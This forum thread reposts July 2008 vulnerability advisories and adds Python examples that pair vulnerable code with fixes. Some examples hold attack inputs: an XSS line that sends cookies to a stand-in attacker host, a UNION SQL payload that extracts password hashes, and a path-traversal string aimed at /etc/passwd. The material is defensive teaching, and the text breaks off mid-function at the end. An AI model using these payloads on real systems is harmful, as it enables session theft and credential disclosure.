Spyware, Viruses, & Security forum

VULNERABILITIES \ FIXES - July 28, 2008

Web Wiz Forum Multiple Vulnerabilities

Secunia Advisory: SA31281
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote

Solution Status: Unpatched


Software: Web Wiz Forums 9.x

Description:
CSDT has reported some vulnerabilities in Web Wiz Forum, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks.

Solution:
Filter malicious characters and character sequences using a web proxy.

Do not browse untrusted websites or follow untrusted links while logged on to the application.

Provided and/or discovered by:
CSDT

Original Advisory:
http://depo2.nm.ru/WebWiz_Forum_v9.5_CSRF.txt
http://depo2.nm.ru/WebWiz_Forum_v9.5_XSS.txt
http://depo2.nm.ru/WebWiz_Forum_v9.5_XSS2.txt

Avaya CMS Sun Java JDK / JRE Same Origin Policy Bypass

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31269
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Security Bypass

Where: From remote

Solution Status: Unpatched


OS: Avaya Call Management System (CMS)

Description:
Avaya has acknowledged a vulnerability in Avaya CMS, which can be exploited by malicious people to bypass certain security restrictions.

Solution:
The vendor recommends that local and network access to the affected systems be restricted until an update is available.

Original Advisory:
http://support.avaya.com/elmodocs2/security/ASA-2008-308.htm

Other References:
SA31010:
http://secunia.com/advisories/31010/

Debian update for ruby1.9

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31256
Release Date: 2008-07-28


Critical:
Highly critical
Impact: DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for ruby1.9. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
http://www.debian.org/security/2008/dsa-1618

Other References:
SA29794:
http://secunia.com/advisories/29794/

SA30924:
http://secunia.com/advisories/30924/

Debian update for python2.5

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31255
Release Date: 2008-07-28


Critical:
Less critical
Impact: Exposure of sensitive information
DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for python2.5. This fixes some security issues, which can potentially be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or to compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
http://lists.debian.org/debian-security-announce/2008/msg00205.html

Other References:
SA25190:
http://secunia.com/advisories/25190/

SA26837:
http://secunia.com/advisories/26837/

Debian update for python-dns

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31254
Release Date: 2008-07-28


Critical:
Less critical
Impact: Spoofing

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0

Description:
Debian has issued an update for python-dns. This fixes a vulnerability, which can be exploited by malicious people to poison the DNS cache.

A vulnerability is caused due to python-dns not sufficiently randomising the DNS transaction ID and the source port number, which can be exploited to poison the DNS cache.

Solution:
Apply updated packages.

Original Advisory:
http://lists.debian.org/debian-security-announce/2008/msg00204.html

Debian update for icedove

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31253
Release Date: 2008-07-28


Critical:
Highly critical
Impact: Security Bypass
Spoofing
Exposure of sensitive information
DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for icedove. This fixes some vulnerabilities, which can be exploited by malicious people to conduct spoofing attacks, bypass certain security restrictions, disclose sensitive information, or potentially compromise a user's system.

Solution:
Apply updated packages.

Original Advisory:
http://www.debian.org/security/2008/dsa-1621

Other References:
SA29133:
http://secunia.com/advisories/29133/

SA30761:
http://secunia.com/advisories/30761/

SA30911:
http://secunia.com/advisories/30911/

reSIProcate Unspecified Memory Consumption Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31251
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: DoS

Where: From remote

Solution Status: Vendor Patch


Software: reSIProcate 1.x



Description:
Some vulnerabilities have been reported in reSIProcate, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerabilities are caused due to unspecified errors within the stack and can be exploited to cause the stack to run out of memory.

The vulnerabilities affect versions prior to 1.3.4.

Solution:
Update to version 1.3.4.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.resiprocate.org/ReSIProcate_1.3.4_Release

fipsCMS light "r" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31250
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: fipsCMS light 2.x

Description:
U238 has reported a vulnerability in fipsCMS light, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "r" parameter in home/index.asp is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 2.1. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
U238

Original Advisory:
http://milw0rm.com/exploits/6135

IceBB "username" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31248
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Vendor Patch


Software: IceBB 1.x

Description:
girex has reported a vulnerability in IceBB, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "username" parameter in modules/members.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 1.0-rc9.2. Prior versions may also be affected.

Solution:
Update to version 1.0-rc9.3.

Provided and/or discovered by:
girex

Original Advisory:
IceBB:
http://forums.xaos-ia.com/?topic=760

http://milw0rm.com/exploits/6137

TriO "id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31244
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: TriO 2.x

Description:
dun has reported a vulnerability in TriO, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in browse.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 2.1. Other versions may also be affected.

Solution:
Filter malicious characters and character sequences using a web proxy.

Provided and/or discovered by:
dun

Original Advisory:
http://www.milw0rm.com/exploits/6141

CMScout "bit" Local File Inclusion Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31243
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Exposure of system information
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: CMScout 2.x

Description:
R3d.W0rm has discovered a vulnerability in CMScout, which can be exploited by malicious people to disclose sensitive information.

Input passed to the "bit" parameter in common.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled, "register_globals" is enabled, and that the underlying web server does not respect ".htaccess" directives.

The vulnerability is confirmed in version 2.05. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
R3d.W0rm, IRCRASH

Original Advisory:
http://milw0rm.com/exploits/6142
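The CMScout item above is a local file inclusion: a request parameter is glued into a path that is handed to include(), and the stated preconditions (magic_quotes_gpc off, register_globals on) are what let a NUL byte and "../" sequences reach that path unescaped. The following is an added example, not CMScout's own code, showing that pattern beside an include resolver that refuses anything outside an allow-list and outside the modules directory. The directory layout, module names and the "bit" values are constructed for the example.

```python
"""Added example (not CMScout's own code): the local-file-inclusion
pattern the advisory describes, beside an include resolver that
confines the name to an allow-list and to the intended directory.
The directory layout and module names are constructed."""
import os
import tempfile
from typing import Optional

ALLOWED_MODULES = frozenset({"news", "users", "forum"})


def resolve_include_vulnerable(modules_dir: str, bit: str) -> str:
    """The shape of the bug: the request value is glued into a path and
    handed to include(). With magic_quotes_gpc off, a trailing NUL in
    the value makes PHP stop reading the path before the appended
    extension, which is what the advisory's precondition is about."""
    return os.path.join(modules_dir, bit + ".php")


def resolve_include(modules_dir: str, bit: str) -> Optional[str]:
    """Hardened resolver. Returns the absolute path to include, or None
    if the request must be refused.

    1. No NUL bytes: they truncate C-string paths.
    2. Exact allow-list match: the only names that exist as modules.
    3. realpath containment as defence in depth, in case a future
       allow-list entry contains a separator or points at a symlink.
    """
    if "\x00" in bit or bit not in ALLOWED_MODULES:
        return None
    base = os.path.realpath(modules_dir)
    candidate = os.path.realpath(os.path.join(base, bit + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> dict:
    """Build a constructed modules directory and try a traversal string
    and legitimate names against both resolvers."""
    traversal = "../../../../etc/passwd\x00"
    with tempfile.TemporaryDirectory() as base:
        modules = os.path.join(base, "modules")
        os.mkdir(modules)
        with open(os.path.join(modules, "news.php"), "w") as fh:
            fh.write("<?php // constructed module\n")
        return {
            # the vulnerable path walks out of the tree and carries the NUL
            "vuln_traversal": resolve_include_vulnerable(modules, traversal),
            "safe_traversal": resolve_include(modules, traversal),
            "safe_not_listed": resolve_include(modules, "../news"),
            "safe_listed_but_missing": resolve_include(modules, "forum"),
            "safe_ok": resolve_include(modules, "news") is not None,
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The allow-list is the control that actually closes the hole; the realpath containment check is there so that a later edit to the allow-list cannot silently reopen it.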

GC Auction Platinum "cate_id" SQL Injection

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31241
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: GC Auction Platinum

Description:
Hussin X has reported a vulnerability in GC Auction Platinum, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cate_id" parameter in category.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation allows e.g. retrieval of administrator usernames and passwords.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Hussin X

Original Advisory:
http://milw0rm.com/exploits/6144

SiteAdmin "art" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31240
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: SiteAdmin

Description:
Cr@zy_King has reported a vulnerability in SiteAdmin, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "art" parameter in line2.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation allows e.g. retrieval of users' e-mail addresses and password hashes.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cr@zy_King

Original Advisory:
http://milw0rm.com/exploits/6145

Youtuber Clone "UID" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31238
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: Youtuber Clone

Description:
Hussin X has reported a vulnerability in Youtuber Clone, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "UID" parameter in ugroups.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Hussin X

Original Advisory:
http://milw0rm.com/exploits/6147

NetBSD update for bind

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31236
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Spoofing

Where: From remote

Solution Status: Vendor Patch


OS: NetBSD 3.1

Description:
NetBSD has issued an update for bind. This fixes a vulnerability, which can be exploited by malicious people to poison the DNS cache.

Solution:
Updated source packages are available (see vendor advisory for further details).

Original Advisory:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-009.txt.asc

Other References:
SA30973:
http://secunia.com/advisories/30973/

Camera Life "id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31234
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: Camera Life 2.x

Description:
nuclear has discovered a vulnerability in Camera Life, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in sitemap.xml.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is confirmed in version 2.6. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
nuclear

Original Advisory:
http://milw0rm.com/exploits/6132

XRMS CRM Information Disclosure and Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31233
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting
Exposure of system information

Where: From remote

Solution Status: Unpatched


Software: XRMS CRM 1.x

Description:
AzzCoder has discovered two vulnerabilities in XRMS CRM, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose sensitive information.

1) It is possible to view certain system information returned by the "phpinfo()" function by accessing the tests/info.php script directly.

2) Input passed to the "msg" parameter in login.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

NOTE: Other scripts are reportedly also affected.

The vulnerabilities are confirmed in version 1.99.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised. Restrict access to tests/info.php (e.g. with ".htaccess").

Provided and/or discovered by:
AzzCoder

Original Advisory:
http://milw0rm.com/exploits/6131

Trac Wiki Engine Cross-Site Scripting Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31231
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote

Solution Status: Vendor Patch


Software: Trac 0.x

Description:
A vulnerability has been reported in Trac, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input passed to certain parameters in the wiki engine is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability affects versions prior to 0.10.5.

Solution:
Update to version 0.10.5 or later.

Provided and/or discovered by:
The vendor credits Nathan Collin.

Original Advisory:
http://trac.edgewall.org/wiki/ChangeLog

cwRsync OpenSSL Denial of Service Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31228
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: DoS

Where: From remote

Solution Status: Vendor Patch


Software: cwRsync 2.x

Description:
Two vulnerabilities have been reported in cwRsync, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Update to version 2.1.4.
http://sourceforge.net/project/showfi...ackage_id=68081&release_id=615606

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sourceforge.net/project/shownotes.php?release_id=615606

Other References:
SA30405:
http://secunia.com/advisories/30405/

PunBB SMTP Command Injection and Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31219
Release Date: 2008-07-28


Critical:
Less critical
Impact: Security Bypass
Cross Site Scripting

Where: From remote

Solution Status: Vendor Patch


Software: PunBB 1.x

Description:
Some vulnerabilities have been reported in PunBB, which can be exploited by malicious people to bypass certain security restrictions or conduct cross-site scripting attacks.

The vulnerabilities affect versions prior to 1.2.19.

Solution:
Update to version 1.2.19.
http://punbb.informer.com/downloads.php

Provided and/or discovered by:
The vendor credits:
1) Dan Crowley
2) Stefan Esser

Original Advisory:
http://punbb.informer.com/forums/topic/19539/punbb-1219/
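The Web Wiz Forums, XRMS CRM, Trac and PunBB items above share two web-application issues: a request parameter reflected into the page without output encoding (cross-site scripting) and state-changing requests that a third-party page can trigger in a logged-in user's browser (cross-site request forgery). The following is an added example, not code from any of those products, showing the unencoded reflection beside the encoded form, and a CSRF token bound to the session with an HMAC so that a token the attacker obtained for their own session does not validate for the victim's. The parameter name, server secret and payload are constructed for the example.

```python
"""Added example (not code from Web Wiz Forums, XRMS CRM, Trac or PunBB):
reflected-XSS output encoding and session-bound CSRF tokens, on
constructed requests."""
import hashlib
import hmac
import html
import secrets

# Constructed server secret; a deployment would load it from configuration.
SERVER_SECRET = b"constructed-secret-do-not-reuse"

# Constructed attacker input for a reflected parameter such as the "msg"
# the XRMS advisory names. It closes the attribute, then injects script.
XSS_PAYLOAD = (
    '"><script>document.location="http://attacker.invalid/?c="'
    "+document.cookie</script>"
)


def render_notice_vulnerable(msg: str) -> str:
    """The pattern the advisories describe: the parameter is echoed
    into the page unencoded."""
    return f'<input type="text" name="msg" value="{msg}">'


def render_notice(msg: str) -> str:
    """Hardened: encode for the HTML attribute context. quote=True also
    turns " and ' into entities, so the value cannot close the attribute."""
    return f'<input type="text" name="msg" value="{html.escape(msg, quote=True)}">'


def _mac(session_id: str, nonce: str) -> str:
    return hmac.new(
        SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256
    ).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce). The HMAC ties the
    token to one session; the nonce makes every issued token distinct."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for the session named by the cookie and compare
    in constant time. Missing or malformed tokens fail closed."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    # compare as bytes so non-ASCII attacker input cannot raise TypeError
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def handle_profile_update(cookie_session_id: str, form: dict) -> str:
    """A state-changing POST handler: refuse unless the token in the form
    validates for the session identified by the cookie."""
    if not verify_csrf_token(cookie_session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return "200 OK: profile updated"


if __name__ == "__main__":
    print(render_notice_vulnerable(XSS_PAYLOAD))
    print(render_notice(XSS_PAYLOAD))
    token = issue_csrf_token("victim-session")
    print(handle_profile_update("victim-session", {"csrf_token": token}))
    print(handle_profile_update("victim-session", {}))
```

Binding the token to the session is what defeats the "attacker gets a token for their own account and embeds it in the forged form" move; a token that is merely random but not tied to a session does not.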

KbLance "cat_id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31123
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: KbLance

Description:
A vulnerability has been reported in KbLance, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cat_id" parameter in index.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
S.L TEAM

Original Advisory:
http://milw0rm.com/exploits/5883
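The fipsCMS light, IceBB, TriO, GC Auction Platinum, SiteAdmin, Youtuber Clone, Camera Life and KbLance items above all describe the same defect: a request parameter concatenated into an SQL query. Most of those parameters are numeric identifiers, which matters for the "sanitise input" advice, because quote-escaping does nothing when the value is not inside quotes. The following is an added example, not code from any of those products, that runs the concatenated query, a quote-escaped variant, and the parameterised fix against an in-memory SQLite database. The schema, rows and the UNION payload are constructed for the example; the stored hash is md5("password"), chosen only so the leak is recognisable.

```python
"""Added example (not code from any of the products in the advisories
above): the SQL-injection pattern those advisories describe, shown on
an in-memory SQLite database with constructed data, beside the
parameterised fix."""
import sqlite3

# Constructed schema and rows standing in for a CMS database.
CONSTRUCTED_SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (username TEXT, password_hash TEXT);
INSERT INTO articles VALUES (1, 'Welcome'), (2, 'Release notes');
INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# The kind of value that would be passed in "id", "cate_id", "art", "UID"
# or "r": no quote characters are needed because the parameter lands in
# a numeric comparison.
UNION_PAYLOAD = "0 UNION SELECT username, password_hash FROM users"


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(CONSTRUCTED_SCHEMA)
    return conn


def browse_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The pattern the advisories describe: request input concatenated
    straight into the query text."""
    sql = f"SELECT id, title FROM articles WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def browse_quote_escaped(conn: sqlite3.Connection, id_param: str) -> list:
    """A common but insufficient 'sanitisation': doubling single quotes.
    It does nothing for an unquoted numeric parameter, so the UNION
    payload still works."""
    escaped = id_param.replace("'", "''")
    sql = f"SELECT id, title FROM articles WHERE id = {escaped}"
    return conn.execute(sql).fetchall()


def browse_safe(conn: sqlite3.Connection, id_param: str) -> list:
    """Fix: validate the type, then bind the value with a placeholder so
    the database never parses it as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, title FROM articles WHERE id = ?", (int(id_param),)
    ).fetchall()


def demo() -> dict:
    """Run the three variants against the constructed database."""
    conn = open_db()
    try:
        browse_safe(conn, UNION_PAYLOAD)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    return {
        "vulnerable": browse_vulnerable(conn, UNION_PAYLOAD),
        "quote_escaped": browse_quote_escaped(conn, UNION_PAYLOAD),
        "safe_normal": browse_safe(conn, "1"),
        "safe_rejected": safe_rejected,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The UNION row that comes back from the first two variants is exactly the "retrieval of administrator usernames and passwords" the GC Auction and SiteAdmin advisories mention; the parameterised query refuses the value before it reaches the database.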

DNS hole - no patch yet from Apple

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

28 July 2008

Unlike Microsoft and the Linux distributors, Apple, perhaps distracted by their recent spate of product launches, has so far not provided a patch for the current security problem in the Domain Name Service. As the vulnerability is already being exploited, anyone using an OS X server for DNS purposes should act immediately.

In early March, Dan Kaminsky discovered a massive security problem in the procedure used for translating names like www.heise.de into IP addresses like 193.99.144.85. It appeared that, with little effort, access to the service could be diverted to other computers on the internet. Kaminsky informed all the major vendors (according to Rich Mogull, who says he assisted Kaminsky in making these contacts, these included Apple) and the vendors agreed to face the imminent threat with a joint strategy.

More: http://www.heise-online.co.uk/security/DNS-hole-no-patch-yet-from-Apple--/news/111187
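The python-dns, NetBSD bind and Apple DNS items above all turn on the same arithmetic: a resolver that varies only the 16-bit transaction ID gives a spoofer a 1-in-65536 chance per forged reply, and because the attacker can trigger fresh queries at will, the expected number of attempts is just that space divided by how many forged replies fit in each race. Randomising the UDP source port as well multiplies the space by the size of the port range. The following is an added example, not code from python-dns, BIND or any vendor: the expected-attempts calculation, a crude predictability check of the kind the public port-randomness testers apply, and a minimal DNS query builder that draws both the transaction ID and the source port from the OS CSPRNG. The ephemeral port range and the sample ID sequences are assumptions constructed for the example.

```python
"""Added example (not code from python-dns, BIND or any vendor): the
search-space arithmetic behind DNS cache poisoning, a predictability
check, and a query builder that randomises transaction ID and source
port with the OS CSPRNG. Samples and port range are constructed."""
import math
import secrets
import struct

EPHEMERAL_LOW, EPHEMERAL_HIGH = 1024, 65535  # assumed source-port range


def port_entropy_bits(low: int = EPHEMERAL_LOW, high: int = EPHEMERAL_HIGH) -> float:
    """Bits of unpredictability a uniformly random port in [low, high] adds."""
    return math.log2(high - low + 1)


def expected_attempts(forged_per_attempt: int, entropy_bits: float) -> float:
    """One poisoning attempt: the attacker triggers a query and lands
    forged_per_attempt distinct forged replies before the real answer.
    It succeeds with probability forged_per_attempt / 2^entropy_bits,
    and attempts can be repeated freely by asking for fresh names, so
    the expected number of attempts is the reciprocal."""
    return (2.0 ** entropy_bits) / forged_per_attempt


def looks_predictable(values: list, modulus: int = 1 << 16) -> bool:
    """Crude check: a source that steps by a constant (including 0) has
    effectively no entropy. Random 16-bit draws fail this test with
    overwhelming probability once a dozen samples are in hand."""
    if len(values) < 3:
        return False
    deltas = {(b - a) % modulus for a, b in zip(values, values[1:])}
    return len(deltas) == 1


def random_source_port() -> int:
    return EPHEMERAL_LOW + secrets.randbelow(EPHEMERAL_HIGH - EPHEMERAL_LOW + 1)


def build_query(name: str, qtype: int = 1) -> tuple:
    """Minimal DNS query in RFC 1035 wire format with a CSPRNG transaction
    ID. Returns (txid, source_port, packet)."""
    txid = secrets.randbelow(1 << 16)
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, 1 question
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    )
    question = qname + b"\x00" + struct.pack(">HH", qtype, 1)  # qtype, class IN
    return txid, random_source_port(), header + question


def txid_of(packet: bytes) -> int:
    return struct.unpack(">H", packet[:2])[0]


# Constructed samples: a resolver that increments its ID per query versus
# one that draws it from the CSPRNG.
SEQUENTIAL_TXIDS = [1000 + i for i in range(16)]
RANDOM_TXIDS = [secrets.randbelow(1 << 16) for _ in range(16)]


if __name__ == "__main__":
    total_bits = 16 + port_entropy_bits()
    print(f"txid only, 200 forged replies per race: ~{expected_attempts(200, 16):.0f} attempts")
    print(f"txid + port ({total_bits:.2f} bits): ~{expected_attempts(200, total_bits):.0f} attempts")
    print("sequential ids predictable:", looks_predictable(SEQUENTIAL_TXIDS))
    print("random ids predictable:", looks_predictable(RANDOM_TXIDS))
```

The numbers are the whole story of the "port randomisation" patches: the fix does not stop spoofed replies, it makes the expected number of races large enough that the attack no longer finishes in minutes.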

RealPlayer update fixes critical security holes

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

RealNetworks has provided updates for various versions of RealPlayer to fix critical security holes. The updates affect versions 10, 10.5 and 11 for Windows, Mac and Linux. Users are advised that installing the update is crucial. Among the problems solved is the vulnerability in the ActiveX module discovered four months ago and a buffer overflow which was rated as highly critical and can be exploited to inject and install malicious software, as advised by security provider, Secunia.

http://www.heise-online.co.uk/security/RealPlayer-update-fixes-critical-security-holes--/news/111188

RealPlayer Releases Update

In reply to: RealPlayer update fixes critical security holes

added July 28, 2008 at 07:52 am

RealNetworks has released an update to address multiple vulnerabilities in RealPlayer. These vulnerabilities may allow an attacker to execute arbitrary code or obtain sensitive information. RealNetworks identifies the vulnerabilities as the following:

RealPlayer ActiveX controls property heap memory corruption.
Local resource reference vulnerability in RealPlayer.
RealPlayer SWF file heap-based buffer overflow.
RealPlayer ActiveX import method buffer overflow.

US-CERT encourages users to review the RealNetworks advisory and apply the appropriate updates to help mitigate the risk.

http://www.us-cert.gov/current/current_activity.html#realplayer_releases_update

Apple's Safari browser vulnerable to session fixation attack

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Apple's Safari web browser, when handling cookies in multipart top level domains (TLDs), contains a vulnerability that potentially allows attackers to access the web services used by the victim. Safari handles multipart TLDs like .co.uk or .com.au differently from normal TLDs like .de or .com. According to a report, this allows attackers to inject the browser with a cookie which Safari will subsequently use for log-in authentication at other servers in the same TLD.

Before carrying out the attack, the attacker receives the cookie to be injected from the web service to be attacked, but created for his own account. As the victim effectively shares the attacker's session, the latter can then spy out the victim's connection. However, the success of this type of attack, called session fixation (PDF file), depends on the respective implementation of the web application. It is, for example, dependent on the IP address and other information being included in the session data. So far there isn't a patch for Safari. Internet Explorer, Firefox and Konqueror were also vulnerable to this type of attack, but the hole was closed in all these browsers almost four years ago.

http://www.heise-online.co.uk/security/Apple-s-Safari-browser-vulnerable-to-session-fixation-attacks--/news/111189
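The post above has two halves: a browser-side check (a Set-Cookie Domain attribute naming a multipart public suffix such as co.uk must be refused, or one site can plant a cookie that every site under that suffix will receive) and an application-side dependency (the planted session is only useful if the application keeps using the session ID it was handed). The following is an added example, not Safari's or any web application's code, showing both: a domain-attribute check against a small public-suffix set, and a session store that issues a fresh ID at login so a pre-set cookie never becomes the victim's authenticated session. The public-suffix subset, host names and session handling are constructed for the example.

```python
"""Added example (not Safari's or any web application's code): a cookie
Domain-attribute check that refuses public suffixes, and a session store
that regenerates the session ID at login. Suffix list and hosts are a
constructed subset."""
import secrets

# Constructed subset of the public suffix list.
PUBLIC_SUFFIXES = frozenset({"com", "de", "uk", "au", "co.uk", "com.au"})


def cookie_domain_acceptable(request_host: str, domain_attr: str) -> bool:
    """Domain attribute rules: strip a leading dot, require the domain to
    domain-match the responding host, and refuse public suffixes outright
    (the check the post says Safari got wrong for multipart TLDs)."""
    host = request_host.lower().rstrip(".")
    domain = domain_attr.lower().lstrip(".").rstrip(".")
    if not domain or domain in PUBLIC_SUFFIXES:
        return False
    return host == domain or host.endswith("." + domain)


class SessionStore:
    """Server-side sessions. login() never promotes the presented ID; it
    retires it and issues a new one, so an ID the attacker obtained
    beforehand is dead by the time the victim is authenticated."""

    def __init__(self):
        self._sessions = {}  # session id -> {"user": str or None}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid: str):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None

    def login(self, presented_sid: str, user: str) -> str:
        # Drop whatever the client presented, whether ours or planted.
        self._sessions.pop(presented_sid, None)
        fresh = self.create()
        self._sessions[fresh]["user"] = user
        return fresh


def demo() -> dict:
    """Constructed run of the attack against a store that regenerates."""
    store = SessionStore()
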